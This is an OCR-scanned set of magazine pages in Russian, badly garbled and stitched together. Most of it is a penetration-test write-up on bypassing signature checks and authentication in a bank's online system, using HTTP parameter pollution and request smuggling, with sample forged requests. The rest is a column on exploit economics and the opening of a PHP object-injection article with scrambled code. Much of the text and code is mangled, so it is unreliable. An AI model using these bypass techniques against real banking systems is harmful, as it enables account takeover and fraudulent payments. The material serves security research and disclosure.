Если обратиться к истории, то можно увидеть, что банки од- 
ними из первых стали использовать гражданскую криптогра- 
фию — шифрование, электронную цифровую подпись, крип- 
тографические протоколы и специализированную аппаратуру. 
Разработчики систем дистанционного банковского обслужи- 
вания (или просто ДБО), таких как онлайн-банки для физиче- 
ских лиц или банк-клиент для юридических лиц, как правило, 
неплохо знакомы с криптографией и умеют хорошо решать 
основные задачи в применении к банковским реалиям: обе- 
спечение безопасной передачи данных, обеспечение неот- 
казуемости банковских операций (то есть цифровой аналог 
собственноручной подписи) и аутентификацию, соответствие 
требованиям государственных регулирующих органов (регу- 
ляторов, в нашем случае — Банка России), защиту морально 
устаревших систем, которые нельзя оперативно обновить. Так 
что если такие системы аккуратно разработаны программи- 
стами, которые хорошо знают основы криптографии и умеют 


Взлом 


> 
Клиент Сервер 
--` Г) 
`..-> 
р : = хз 
ри 
низАчнорОни Криптосервер Сервер приложений 
Браузер "УННеЛЯ ы ДБО 
Подписывает входящие ь зи ри Доверяет специальным заголовкам 
запросы и кладёт всё ванаьки авик от криптосервера, сопоставляет 
8 дополнительные ое ви сАИНЕ идентификатор сессии со значением 
заголовки запроса причеонении из заголовка 


их применять, используют признанные алгоритмы с хорошо 

изученной криптостойкостью, то их сложно сломать, потому 

что в этом случае придется искать уязвимости, к примеру, 

в реализации ВАЗА или научиться эффективно факторизовать 

числа... 

А воти нет. Все так красиво и безопасно только на словах. 
Даже в военной сфере, авиации и прочих областях разработ- 
ки ПО, где надежность жизненно важна и где в процессы раз- 
работки интегрированы методы формальной верификации, 
в программах время от времени находят ошибки. Финансовые 
приложения существенно менее критичны в плане надежно- 
сти (от сбоя ДБО, скорее всего, никто не умрет), и формальная 
верификация — нечастый гость даже в процессах разработки 
современных финансовых приложений, не говоря уже о ста- 
рых системах, разработанных лет двадцать назад или еще 
раньше. 

Каждый банк, который хочет предоставлять доступ к финан- 
совым транзакциям через интернет, вынужден выбирать один 
из двух вариантов реализации: 

. использовать типовое решение одного из хорошо извест- 
ных на рынке вендоров, например В$$ (\м/\мим.655у$.сот/ 
еп/) или ВИЙ (м/м. 6НИ.согп), и «заточить» его под себя; 

. разработать самостоятельно (или заказать у стороннего 
разработчика) собственную систему. 


В первом случае банк получит в готовом виде всю требуе- 
мую регуляторами криптографическую обвязку. Второй вари- 
ант оставляет решение вопросов, связанных с криптой, в веде- 
нии самого банка. И в этом случае на сцену выходят, все в белом 
(то есть сертифицированные ФСБ), многочисленные крипто- 
графические средства и криптопровайдеры, предоставляющие 
свои услуги. 

О втором варианте как раз и пойдет сегодня речь. Мы рас- 
смотрим современные системы дистанционного банковского 
обслуживания, работающие поверх обычных интернет-со- 
единений (рис. 1). И предложим подход к поиску уязвимостей 
проектирования в этих финансовых приложениях, на примере 
клиент-банка одного из крупных европейских банков. Данный 
подход особенно актуален и интересен тем, что в России до- 
вольно много банковских приложений реализуют именно такую 
архитектуру ДБО. 

Забегая немного вперед, скажем: по нашему опыту, самая 
«вкусная» часть таких приложений — специализированный 
протокол взаимодействия компонентов между собой. Дей- 
ствительно, криптосервер должен передавать серверу при- 
ложений результаты проверки ЭЦП из запроса пользователя. 
Сервер приложений при этом должен доверять этим результа- 
там, так как сам не использует криптографические примитивы 
(В этом была вся идея!). Фактически методика взлома такой 
схемы состоит из обратной инженерии протокола взаимо- 
действия с тем, чтобы понять, как серверу приложений пере- 


Рис. 1. Шифрование, 
обеспечение неот- 
казуемости операций 
иаутентификация 


вДБО 


У\УАВММС 


Информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 


Рис. 2. Трасса, со- 
бранная спомощью АР! 
МопКог 
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Утверждение А: нельзя так просто взять и создать крипто- 
графический протокол уровня приложений с нуля. 


Когда разработчик пытается изобрести «на коленке» безопас- 
ный специализированный протокол с использованием крипто- 
графических примитивов без предварительных шагов типа раз- 
работки спецификации, формального доказательства свойств 
протокола, использования безопасного процесса разработки, 
у него, скорее всего, ничего не выйдет. 


Утверждение Б: нельзя так просто взять и реализовать 
НТТР-клиент или НТТР-сервер с нуля. 


Когда программист пытается создать свой новый клевый НТТР- 
клиент или НТТР-сервер, с блек-джеком и всеми теми фичами 
безопасности, которых ему так хочется, и при этом он не бооде 
или Мсго$ой в смысле бюджета, количества рабочей силы 
и плана выпуска продукции, у него, скорее всего, также ничего 
не выйдет. А теперь представим, что мы имеем дело с резуль- 
татами обоих утверждений в одном месте. Это означает кучу 
сделанных «на коленке» парсеров, поверх которых работает 
прикладной протокол, «защищенный» криптографическими 
примитивами. Все это дает высокую вероятность появления 
уязвимости после интеграции всех частей в единое решение. 
Что касается любого нарушителя, то изначально он уже будет 
обладать следующими возможностями: 

. заходить в систему в качестве легитимного пользователя 
(мы всегда можем стать клиентом атакуемого банка — на- 
пример взяв у него кредит :)); 

. иметь полный доступ к клиентскому ПО (и аппаратуре), 
что позволяет осуществлять обратную инженерию про- 
ИЗВОЛЬНОГО «толстого» клиента и протокола, по которому 
он обменивается данными с сервером, мониторить работу 
с аппаратными ключами и так далее. 


Чтобы определиться с условиями, под успешным хаком 
ДБО будем понимать получение доступа к счетам других кли- 
ентов с возможностью генерировать запросы на выполнение 
платежей от их имени, которые корректно проводятся серве- 
ром. Мы планируем сделать это, обойдя проверки ЭЦП за счет 
использования различий в обработке протокола НТТР элемен- 
тами многозвенной архитектуры банковского решения. Но пре- 
жде необходимо детально изучить «пациента». Три основных 
шага обратной инженерии ДБО, которые помогут нам спра- 
виться с задачей, включают в себя: 

. реверсинг деталей реализации клиента; 
. фингерпринтинг серверной части; 
. реверсинг и анализ протокола взаимодействия. 


Основной задачей первого шага является реверсинг крип- 
тографического протокола, реализованного на клиентской 
стороне криптосистемы. Криптосистему можно представить 
черным ящиком, который внедряется между браузером поль- 
зователя и сервером приложений и делает следующее: 

1. Устанавливает шифрованный туннель (ЗЗЕ/ТЕ$ или специ- 
ализированный \РМ — без разницы). 

2. Подписывает каждый исходящий НТТР-запрос на клиенте. 
Эта часть может быть реализована (и часто так и делают) 
как веб-прокси, который слушает на локальном порту кли- 
ента. 


Е ЗЕ, 
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дается результат валидации запроса пользователя, а потом 
научиться подделывать и передавать эти идентификационные 
данные. 
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ПРЕДЛАГАЕМ ЫЙ ПОДХОД 

Для начала сделаем пару утверждений общего характера 
на уровне здравого смысла о процессе разработки приложе- 
ний в банковской сфере и оставим их без доказательства; они 
помогут нам в поиске уязвимостей проектирования. 


пы 9есоде [...| 
еп (988, Оооо чь с, 3453 0] 
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3. Проверяет целостность и аутентичность НТТР-запросов, по- 
кидающих туннель на серверной стороне криптосистемы. 

4. Передает проверенные запросы серверу приложений, к ко- 
торым прикрепляет метаданные, содержащие идентифи- 
катор пользователя и результаты криптографической обра- 
ботки запроса («Все ОК», «Ключ устарел» и так далее). 


Рис. 3. В буфере мы ви- 
дим структуру запроса 
отклиента, добавлены 
специальные заголов- 
кикзапросу 


Рис.4....икакаяинфор- 
мация подписывается 
ЭЦП — Рогт_да{фа 


Реверсинг криптопротокола на стороне клиента — не выс- 
шая математика, достаточно воспользоваться АР|!-монитором 
и любимым отладчиком и с их помощью получить ответы 
на следующие вопросы: 

1. Какой НТТР-клиент (и парсер) используется на стороне кли- 
ента (\\МИпао\м/$ АР|, Чауа НТТР СПетф ...)? 

2. Какие элементы СЕТ-запроса подписываются ЭЦП? Весь 
запрос или только ЦАЕ? Какие запросы поддерживаются: 
РОТ, СЕТ, НЕАО, ТВАСЕ? 

3. Какие элементы подписываются у РОЗТ-запроса? Весь за- 
прос, только тело или тело и ЧРИ? 

4. Какая служебная информация передается с запросом? 
Как передается ЭЦП? Как передается идентификатор клю- 
ча? Например, это могут быть кастомные заголовки, такие 
как Х-Слет-Кеу-14. 


После этого можно переходить к изучению функционально- 
сти криптосервера. Здесь предстоит сделать несколько вещей: 
проанализировать особенности парсера НТТР на криптосерве- 
ре, проанализировать сам веб-сервер криптосервера и, нако- 
нец, проанализировать взаимодействие криптосервера и сер- 
вера приложений. 


АНАЛИЗ НТТР-ПАРСЕРА КРИПТОСЕРВЕРА 

Основные проверки, которым следует подвергнуть крипто- 

сервер, представляют собой следующий список: 

. Как НТТР-парсер криптосервера обрабатывает дубли- 
рующиеся имена параметров в СЕТ- и РОЗТ-запросах? 
Какое значение будет использовано: первое или послед- 
нее? И что насчет одинакового имени параметра в ЧАЕ 
РОЗТ-запроса и в его теле (да-да, речь о НТТР Рагатщег 
РоЙиюоп)? 
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. Как криптосервер обрабатывает дублирующиеся заголов- 
ки? Какое значение будет использовано: первое или по- 
следнее? 

. Какие символы используются для разделения заголовков 
(САЦЕ СР или что-то еще)? 


Цель этого этапа — обнаружить различия в обработке НТТР 
на стороне криптосервера, где выполняются проверки подпи- 
си, ина сервере приложений, где выполняется непосредствен- 
но обработка запроса, используя которые мы могли бы реали- 
зовать идею атаки вида ХМЁЕ зодпафиге мтаррта аНаск, только 
для НТТР, при помощи все тех же известных методов: ргофосо! 
эзтидата и рагатщег роЙийоп (в примере ниже ты увидишь, 
как конкретно это работает на реальном приложении). 


АНАЛИЗ СЕРВЕРА НТТР 

Следующий этап анализа позволит выяснить детали обработки 

протокола НТТР на сервере. Здесь нам нужны ответы на следу- 

ющие вопросы: 

. Какие версии протокола НТТР поддерживаются? Поддер- 
живается ли НТТР/О.9? 

. Поддерживаются ли множественные НТТР-запросы через 
одно соединение? 

. Как криптосервер обрабатывает некорректные или дубли- 
рующиеся заголовки Сощет-1епо\? 

. Какие НТТР-методы разрешены? 

. Поддерживает ли криптосервер ти#рат-запросы или 
чанки? 


АНАЛИЗ ПРОТОКОЛА ВЗАИМОДЕЙСТВИЯ 

Напомним, мы бы хотели уметь форджить осмысленные за- 

просы, которые будут обрабатываться сервером приложений 

как доверенные. Наиболее очевидный и простой способ пере- 
дачи метаданных от криптосервера к серверу приложений — 
через НТТР-заголовки, добавляемые к запросам клиента. Соот- 
ветственно, знание «секретных» управляющих заголовков может 
предоставить тебе полную власть в банковских приложениях. 

Действительно, криптосервер должен каким-то образом 
передавать серверу приложений идентифицирующую инфор- 
мацию о пользователе, который сделал запрос. Грубо говоря, 
криптосерверу нужно вместо вороха пришедшей к нему ме- 
таинформации, являющейся продуктом криптографических 
преобразований, передать серверу приложений просто иден- 
тификатор пользователя, который сделал запрос. Сервер при- 
ложений же должен доверять полученной информации. Это 
свойство (то есть протокол взаимодействия между криптосер- 
вером и сервером приложений, который отделен от криптогра- 
фических примитивов) становится неотъемлемой частью архи- 
тектуры, когда разработчики решают использовать в качестве 
фронтенда стороннее криптографическое решение. 

Все это хорошо, но как мы узнаем названия этих управляю- 
щих заголовков? Тут доступны следующие варианты: 

. угадать/сбрутфорсить; 

. прочитать документацию на криптосервер; есть надеж- 
да, что названия управляющих заголовков не поменялись 
в установленной версии; 

. атака методом социальной инженерии на разработчиков 
криптографического решения; можно притвориться заказ- 
чиком и спросить, как будет их криптосервер передавать 
результаты проверки запросов твоему бэкенду; 

. прочитать заголовки в ответе от самого приложения (см. от- 
ладочные интерфейсы, подробные сообщения об ошибках, 
метод ТВАСЕ); 

. обратная инженерия криптоклиента или криптографических 
библиотек; возможна ситуация, когда метаданные, присое- 
диненные к исходящим запросам на стороне клиента, будут 
только валидироваться криптосервером, но никак не изме- 
няться. Действительно, зачем менять клевые названия за- 
головков? 


Криптосервер должен каким-то образом 
передавать серверу приложений идентифи- 
иирующшую информацию о пользователе 


74 Взлом 


ПРИМЕРВЗЛОМА 

Ну а теперь, собственно, о самом интересном. Все началось 
как обычно. Большой европейский банк с филиалом в России 
попросил проанализировать безопасность их ДБО, защищен- 
ного криптоалгоритмами семейства ГОСТ. Почти сразу после 
начала анализа мы нашли несколько типовых веб-уязвимостей, 
которые позволяли, например, получать список всех пользова- 
телей и менять им пароли. Плюс обнаружили отладочный ин- 
терфейс, который распечатывал полностью НТТР-запрос, по- 
лученный веб-приложением (так что с именами управляющих 
заголовков мы разобрались довольно быстро). 

К сожалению, критичность этих уязвимостей оказалась су- 
щественно ниже привычной из-за криптографический защиты: 
даже зная логин и пароль, мы не могли залогиниться в систему 
без соответствующей ключевой пары. Кроме того, клиентская 
часть криптосистемы удаляла все управляющие заголовки 
из пользовательских запросов, таким образом запрещая нам 
манипулировать ими напрямую. 

Сам клиент представлял собой прокси уровня приложе- 
ний, работающий на стороне пользователя между браузером 
и криптосервером. Пристальный взгляд на клиентскую часть 
позволил выявить криптографические примитивы, реализо- 
ванные в поставляемых вместе с клиентом разделяемых библи- 
отеках, и с помощью АР! МопКог нам удалось установить хуки 
на вызовы АР!, проанализировать полученные трассы и выта- 
щить оттуда нужную информацию. 

Изучение буфера с пользовательскими данными раскрыло 
структуру запроса от клиента, в частности, в него были добав- 
лены специальные заголовки СейЯсае питбег, Рогт_ааа, 
Зюпаге (рис. 3), атакже было видно, какие данные из запроса 
подписывались с помощью ЭЦП (рис. 4). 

Для нас наиболее интересен тут заголовок Сеййсае_ 
питрег, который, очевидно, содержит идентификатор ключа 
клиента, а также заголовки Гогт_аа{а и Зюпафге, которые со- 
держат параметры запроса (в данном случае строку запроса) 
и ЭЦП соответственно. 

В результате клиентский запрос, который в оригинале вы- 
глядит так: 


СЕТ /1021п?пате=уа1ие НТТР/1.1 
НОЗЕ: 10.6,28.19 


после обработки криптоклиентом становится таким: 


СЕТ /1021п?пате=уа1ие НТТР/1.1 

Нот: 10.6.28.19 

СегЕ1Асае_питбег: и$г849 

Рогт_афа: пате=уа1ие 

512пафиге: 688А57АЗЕАДЭС25077С01Е4Е95705752С69Е61+« = 
03451Е870018046С510С9А9АО063С7718708159В7ЕСЕБЕСВЕ«= 
024424Е8130865ЕЁР5Е2021027389Е03319СА2507003 


Играясь с методами и параметрами запросов, мы заметили, 
что прокси подписывает только строку запроса в случае СЕТ- 
запросов и только тело в случае РОЗТ-запросов. Стало понят- 
но, что криптосервер для каждого запроса выполняет пример- 
но такое предписание: 


Рис. 5. Какзапрос 
РОЗТ выглядит после 
прохождения крип- 
топрокси: подписано 
только значение из 
тела запроса, при этом 
значение из строки 
запроса осталось неиз- 
менным 


Рис. 6. Итоговый век- 
тор атаки на механизм 
обеспечения неотказу- 
емости — атакующее 
значение передаем 

в строке запроса, 
автеле оставляем до- 
веренные значения 


Рис. 7. Обычный запрос 
наавторизацию 


Браузер 


Клиент 


Криптопрокси 
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1. Проверить, что заголовок Еопт_аа{а отражает строку запро- 
са или тело, в зависимости от типа запроса. 

2. Проверить, что значение заголовка Се|ййсае_ питбег ука- 
зывает на того же пользователя, который устанавливал без- 
опасное соединение с помощью своего сертификата. 

3. Проверить, что заголовок Зюпайие содержит коррект- 
ную подпись заголовка Гогт_ааа, используя Ш ключа 
из Сеййсже питрег. 


Выглядит солидно, не так ли? 


ОБХОД МЕХАНИЗМА ОБЕСПЕЧЕНИЯ 

НЕОТКАЗУЕМОСТИ ОПЕРАЦИИ 

Что ж, сначала мы посвятили немного времени анализу и фин- 

герпринтингу. И вот что мы нашли: 

1. Прокси на стороне клиента не добавлял заголовки Гопт_аз{а 
и Здпафшге к запросам НЕА, они передавались без подпи- 
си и каких-либо проверок, клиентская часть только добавля- 
ла номер сертификата клиента. 

2. Прокси на стороне клиента не учитывал, что РОЗТ- 
запросы могут содержать не только параметры в теле 
запроса, но и строку запроса. Для РОЗТ-запросов подпи- 
сывались только параметры из тела, а строка запроса пе- 
редавалась серверу приложений без изменений. Теперь 
можно было попробовать НТТР рагатщег роЙ!ийопт (НРР) 
и передавать параметры с одним и тем же именем в теле 
и в строке запроса. Что и было сделано. В результате мы 
обнаружили, что криптопрокси подписывает только пара- 
метры в теле запроса и передает строку запроса без из- 
менений, криптосервер также проверяет подпись только 
для тела (см. заголовки Гогт_аза и Зюпаиге на рис. 5) 
и передает строку запроса серверу приложений в неиз- 
менном виде. 


Убедившись, что сервер приложений отдает предпочтение 
параметрам, получаемым в строке запроса, а не в теле, мы 
смогли обойти механизм обеспечения неотказуемости при по- 
мощи такого вектора: нужные нам значения параметров запро- 
са ставим в строку запроса, а в теле оставляем те значения, 
которым криптопрокси будет доверять. При этом, как ты пом- 
нишь, сервер приложений первым делом смотрит в строку за- 
проса, а значит, мы удачно обошли все проверки, и при этом 
незаметно для всех компонентов системы. 


Криптосервер Сервер приложений 


ДБО 
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Сервер приложений 
ДБО 


ОБХОД АВТОРИЗАЦИИ 

Все это хорошо, только кого волнует эта неотказуемость, если 
механизмы аутентификации остаются неприступными? По- 
этому идем копать дальше. Напомним, что к этому моменту мы 
умеем просматривать список всех пользователей ДБО, менять 
им пароли и, кроме того, отправлять серверу приложений за- 
просы таким образом, что криптосервер считает их корректно 
подписанными, а сервер приложений использует параметры 
без подписи. 

Предположим, что мы хотим атаковать пользователя с иден- 
тификатором 10=0х717 и уже установили ему новый пароль. Те- 
перь мы бы хотели залогиниться под ним. В обычной ситуации 
аутентификационный запрос выглядит как на рис. 7. 

С передачей этого запроса есть две проблемы: во- 
первых, прокси на стороне клиента удаляет все управля- 
ющие заголовки из запроса от браузера. В нашем случае 
будет удален заголовок СейЯсае питрег. С этим можно 
справиться, реализовав свой собственный криптоклиент, 
который связывается с криптосервером и передает все, 
что нам нужно, с правильными заголовками. Вторая пробле- 
ма заключается в том, что криптосервер сравнивает пара- 
метр СеШсате питрЬег из заголовка, полученного в НТТР- 
запросе, с номером сертификата, который был использован 
для установки шифрованного туннеля. Вот в этом-то вся за- 
гвоздка. Чтобы продвинуться дальше, нужен был очередной 
трюк. И мы его нашли. 

Помнишь, мы научились отправлять НЕАО-запросы со стро- 
кой параметров без какой-либо подписи? Вдобавок к этому мы 
заметили, что каждый раз через одно ТСР-соединение крипто- 
клиент передает только один НТТР-запрос, после чего крипто- 
сервер разрывает соединение. 

И мы подумали: а что, если отправить два НТТР-запроса 
в одном ТСР-соединении один за другим? Оказалось, что крип- 
тосервер будет считать их одним большим НТТР-запросом. 
Бинго, рго{осо! зтидойто! 

Вот как криптоклиент обрабатывал два последовательных 
запроса, первый из которых — НЕАП: 

. клиент парсил их как одно НТТР-сообщение 

со строкой запроса, заголовками и телом; 

. удалял все управляющие заголовки из первого 
запроса (ну да, второй-то он считает телом первого); 
. добавлял корректный заголовок СейЯсае питрег 

в первый запрос; 

. как было показано выше, он, без добавления заголовков 

Рогт_ааа или Запафиге, отправляет НЕАО-запрос 

(с телом, без проверки) в криптотуннель. 


А вот как криптосервер обрабатывал полученные запросы: 

. онтакже считал их единым НТТР-сообщением:; 

. сервер проверял значение заголовка СейНсае питрег 
на совпадение с параметрами установленного 
криптотуннеля; 

. для НЕАО-запроса криптосервер не проверял 
отсутствующие заголовки Гопт_аа{а и Здпафиге, 

а сразу передавал результат серверу приложений, 
добавив к нему необходимые управляющие заголовки. 


Нормальные герои всегда идут в обход! 
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Рис. 8. Криптоклиент 


икриптосервер счита- 


ютдва последователь- 


ных НТТР-запросавод- 


ном соединении одним 


большим запросом 


Рис.9. Итоговый вектор 


атаки на аутентифи- 


кацию 


Сервер приложений, в свою очередь, корректно обрабаты- 
вал полученные данные как два отдельных НТТР-запроса, при- 
чем обрабатывал оба. Вот так мы смогли обойти авторизацию 
(см. рис. 8 и 9). Наиболее важной тут оказалась возможность 
передавать управляющие заголовки во втором запросе. Ведь 
второй запрос криптосистема считает телом первого, поэтому 
вообще его не обрабатывает. 

После того как два запроса (рис. 9) будут обработаны кли- 
ентской частью криптосистемы, у нас окажется два корректных 
НТТР-запроса, первый от имени нашего пользователя, а второй 
от имени произвольного пользователя системы. Шах и ма!! 


ЗАКЛЮЧЕНИЕ 

В результате мы достигли возможности отправлять полно- 
стью доверенные запросы от имени «зловредного» клиента 
к серверу банка, как если бы они были сгенерированы ле- 
гитимным клиентом. Мы полагаем, что подобный подход 
к анализу систем «сверху вниз» можно использовать прак- 
тически для любой специализированной криптографической 
системы, потому что ключевое значение имеет человеческий 
фактор (в нашем случае это приняло форму неверного пред- 
ставления о современных протоколах уровня приложений, 
о сложных веб-фреймворках и их внутренней кухне). Кроме 
того, разобранный пример анализа ДБО может оказаться 
полезным для других исследователей защищенности про- 
граммных продуктов. 

В качестве послесловия процитируем слова Ади Шамира 
из его недавнего выступления на ВЗА Сопт{егепсе 2013: «Я дей- 
ствительно верю, что значимость криптографии снижается. 
Даже самые защищенные компьютерные системы в самых 
физически изолированных местах успешно взламывались в по- 
следние пару лет в результате АРТ (Адуапсеа Регязет ТИгеаф, 
целенаправленная атака на конкретную систему) и других про- 


рее 


двинутых атак». —- 


ПОТОМУ ЧТО НИЧТО 
НИКОГДА НЕ МЕНЯЕТСЯ... 


Если напрячь извилины, то можно вспомнить изрядное число недавних публика- 
ций и выступлений с похожими техниками обхода механизмов защиты: 

ХМЕ Зодпафиге \Мгаррто; 

Оп ВгеаКта ЗАМГ: Ве \ЛПоеуег Уои \ММап{ {о Ве (Б\И.1у/Вмма0СК); 

Апа!у$!5 о? Зюпашге Мгарртода АЦКаск$ апа Соищегтеазиге$ (Би.у/1ОНЫУРМ/); 
С\МЕ-З47: тпргорег Мепйсаноп о? Сгуроодгар с Зюпашге и связанные с ней С\Е 
(Б.у/12пЕЯХМ); 

погугли по запросу «НРР Бура$$ \\МАЁР» — куча разных статей; 

СМЕ-444: псопязет щегргааноп о НТТР Ведцие$5 и связанные с ней С\УЕ 


(6Н.1У/1472\; 


\Меб Арр Сгурюоду: А Зиау т Райиге (Би.1у/1Зи 6 1Е); 


разное: небезопасные генераторы случайных чисел, некорректные реализа- 
ции РК как примеры некорректного использования криптографии. 
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® ЗАЧЕМ 
В ВАМ 
Я Е МЕТ 


Уже достаточно давно производители ОС пытаются помешать злобным хакерам 
эксплуатировать уязвимости в ПО. При этом многие из их поделок так или иначе 
взламываются и обходятся, что вызывает праведные крики вроде «Винда маз- 
дай», «Винде капец» (да-да, опять я на винде сфокусирован). Но если проследить 
эволюцию этих техник, как и атакующих техник, то можно обнаружить некую логи- 


ку и смысл всей этой гонки вооружения. 


ПРИЧИНА ВСЕГО — ДЕНЬГИ 
Давным-давно, в далекой-далекой... нет, постой, не так. Не- 
давно, каких-то 10-12 лет назад, эксплойты под нашу люби- 
мую винду были сущим адом. Были массовые черви, сервер- 
сайд эксплойты (ну то есть нацеленные на сервисы винды, 
а не на клиентское ПО типа офиса или браузера). Все это 
мило жило, процветало и добра наживало. Причина проста: 
достаточно найти уязвимость в любом ПО типа переполнения 
буфера или ошибки с указателем памяти — и ты можешь за- 
хватить контроль без особого труда и тайных познаний недр 
процессора и железа. Таким образом, надо понимать, что лю- 
бая атака имеет цену, которую складывают несколько состав- 
ляющих: 
. цена поиска уязвимости: 

. написание фаззера, 

. вычислительные мощности, 

. время; 
. цена написания эксплойта: 

. триггер уязвимости — перехват управления (ЕР), 

.  шелл-код. 


При этом оставим за скобками постэксплуатацию и боевую 
нагрузку: 


. бэкдор, 
.  эксплойт ппа 0, 
. руткит. 


В определенный момент создатели ОС и железа поняли, 
что надо как-то «усложнять задачу» этим мерзким парням, 
и началась гонка вооружения, которая идет до сих пор. Рах, 
Заскотеа, ОЕР АЗЕВ, ЕМЕТ... Да много чего можно сейчас 
вспомнить. Плюс механизмы песочницы, которые нынче есть 
во многих клиентских приложениях, в частности в браузе- 
рах и читалках РОВЕ. Они работают с определенной степенью 
эффективности. Теперь самое интересное: цель защиты — 
не предотвратить взлом полностью, а усложнить атаку так, 
чтобы цена атаки была выше, чем возможная прибыль. Да, 
взломать можно все, но какой ценой? Именно этот вопрос 
будет решающим в кибервойнах и защите от крупных кибер- 
атак. Защита должна стоить дешевле, чем орудие проникнове- 
ния, при этом использование и создание такого оружия будет 
очень дорого. В пределе цена должна стремиться к бесконеч- 
ности — это идеальная защита :). 

В прошлом году представитель Мсго$ой заявил, что цель 
создания всех этих ваших ЕМЕТ и прочих защитных метод 
и есть все вышесказанное: 


ХАКЕР 07 /174/ 2013 


Эффективность 
эксплойта 


Колонка Алексея Синцова 


Эффективность 
эксплойта 


Цена создания эксплойта 


Эффективность 
эксплойта 


Цена создания эксплойта 


1. Увеличение количества инвестиций, необходимых для по- 
иска опасных уязвимостей. 

2. Увеличение количества инвестиций, необходимых для на- 
писания функциональных и работоспособных эксплойтов. 

3. Сокращение возможности хакеров вернуть свои инвести- 
ции. 


К слову, большая часть «рынка эксплойтов» поддерживает- 
ся государственными организациями, и в этом есть некоторая 
ирония. Причем именно эти структуры накачивают рынок день- 
гами... То есть наиболее сложные и дорогие эксплойты именно 
там, у Большого Брата, и их количество неизвестно, но точно 
больше чем то, чем обладают киберпреступники. С другой сто- 
роны — мир эксплойтов не заканчивается на уровне ПО/ОС. 
Мы имеем процессоры, прошивки, смартфоны, и под все это 
дело создаются и покупаются боевой код и прочие решения 
«нападательного характера». Пентестеры и секурити-консуль- 
танты фактически плетутся сзади всей этой колонны, хотя так- 
же привносят вклад в развитие рынка. Что это значит для поль- 
зователей? Скорее всего — ничего. Вряд ли ЦРУ интересна 
ваша переписка ВКонтакте настолько, чтобы «тратить» экс- 
плойт стоимостью в сотню тысяч долларов. Простые защитные 
механизмы работают против «дешевых» атак, которые можно 


встретить на просторах интернета, от китайских, славянских 
и прочих производителей такого добра. Но и там накапливает- 
ся опыт и сложность атак растет, как, впрочем, и защитные тех- 
ники обрастают новыми плюшками с каждым новым релизом, 
будь то ОС, ПО браузера и так далее. 


ТАКИ ЧТО? 

Можно не вдаваться в технические детали того, как работа- 
ют защитные механизмы или иные трюки. Так или иначе, су- 
ществуют техники обхода, а если не существуют, то не факт, 
что завтра их не обнаружат или что они не держатся в секре- 
те. Но это не значит, что можно на них забить и их игнориро- 
вать. В принципе, любой анализ последних атак, которые 
стали доступны в паблике, покажет вам, что банальный ЕМЕТ 
или песочница СИготе способна остановить большую часть 
этих нападений (да, всегда есть уама, которая портит вообще 
любую защитную технику). Поэтому использование защи- 
ты хоть и не гарантирует ничего на 100%, но если ты знаешь, 
как она работает, какие атаки останавливает, как влияет на эф- 
фективность работы и что нынче происходит злого в интернете, 
то сможешь самостоятельно оценить риски и эффективность 
текущей защиты и даже вероятность событий и атак. Для этого 


== 


лаже не надо тратить миллионы на консультантов у = 
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Рис. 1 

Так бы это было в да- 
леком 2001-м. Ценана 
создание эффективно- 
го эксплойта 


Рис. 2 

Споявлением за- 
щитных техник при той 
же цене эксплойтуже 
работать не будет 


Рис. 3 

Для обхода защитных 
техник придется делать 
более сложныйи до- 
рогой эксплойт 


Рис. 4 

Примерные этапы 
создания боевого 
эксплойта внаши дни. 
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Свежие способы 
эксплуатации 
РНР ОБесЕ 
Шуесноп 


На дворе 2013 год, а уязвимость, 
связанная с преобразованием 
непроверенных сериализованных 
данных в представление РНР, 

она же ипзепайте-баг, все еще 
актуальна. Более того, проведенное 
мной исследование встроенных 
классов РНР показало, что возможны 
и новые, более универсальные 
способы эксплуатации, 
использующие уязвимости самого 
интерпретатора. 


РНР ОВУЕСТИМУЕСТЮОМ 

В 2009 году небезызвестный Стефан Эссер на конферен- 
ции Ромег о СоттипйКу в Сеуле выступил с исследовани- 
ем 5Зпоскта Мемз ш РНР Ехр!оКайоп, где, помимо прочего, 
выявил возможные сценарии атак, когда пользовательские 
данные попадают в функцию ипзепай;е(). Можно сказать, 
что именно тогда появился новый терминРНР ОШес{ тесйоп, 
обозначающий уязвимость, позволяющую внедрять произ- 
вольные объекты РНР в контекст веб-приложения. Уязви- 
мость позволяет проводить множество атак: от Х$$ до вы- 
полнения произвольного кода, в зависимости от структуры 


объектов уязвимого приложения. 


ЗОДРаызов на аси ОРФО 


фечлеги = печи бозоСиее! гаи! 
апау юкабоп => 


минах гузииегась ро’, "и’ => 
Авео г аСу 9/1 


фечрги = ипорпанс в зрпанге4 $ ег) 
фею ое ода Нате 0 


оаоС ги генерирует 
исключение боаовацИ 
Бала! ето ЦасацамМ 


ЗоарЕаи! ехсерюю: |НТТР] 
«зспооаег( 1); Асио> п 
аррепдег_ зоскех зегуег. ри 


Отсутствие какой-либо фильтрации 


р:71 


Схема реализации Х$$ через ЗоарСйеп{ 


79 


зоар_\мегзюп 
обит 

раззилого 

риоху МО 
ргоху_ рог 
ргоху ТОО“ 
ргоху_ра55умога 
са сег 
раззрИ газе 
ашпепкацоп 
сотргезюл 
епсо {по 

асе 

саззглар 
ехсерюп5 
сопгьестоп_Иглиесил 
уретар 
{уре_пате 
{уре_п5 
Кагпхгт| 
сасИе_ м5] 
узег_адегтт 
угеат_сопехх 
фоаигея 
кеер_а|ме 


руб\е ЗоарСЦеп!::5оарСИети [ пухед $\/$4\ [, аггау ЗорНоп® ] ] 


\\ЗОЕ - М/еБ $еглсе$ ОБезспрНоп [апоцаде 


МО -режим 


Моп-\/50Т режим 


ея № Ум = пый 


ЗоарСПег! невозможно 
сермализовать 


Объект можно 
ыспользовать в 
ипзепайге 


Работа класса 
ЗоарСйет 
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РНР ОЦес тесйоп 
на ОМ/АЗР: 
Би. [у/15\6мАМ/ 


опоскпо Мем$ 
п РНР Ехр!оКаНоп: 
БИ. У/11тсуН 


Магические 
методы РНР: 


ок. 1у/172апб 


Араспе |094рйр:_ 
Би. у/аР7 НС 


ХХЕ Ощ-0{-Вапа 
Бата Вештема!: 


Би. 1у/12ру МБ 


Сериализованные данные после преобразования в объ- 
ект РНР могут изменить рабочий процесс приложения 
с помощью так называемых магических методов. Напри- 
мер, если у класса определен магический метод __де{(), 
то он будет вызываться каждый раз, когда у объекта запра- 
шивается несуществующее свойство. При эксплуатации 
РНР ОШес{ шесНоп наиболее полезны методы _ м/акечр() 
и _ Чезгис(): первый вызывается при десериализации 
объекта, второй — при выгрузке объекта, то есть при завер- 
шении работы скрипта. Оба метода вызываются автомати- 
чески, без необходимости проводить какие-либо операции 
над объектом. 

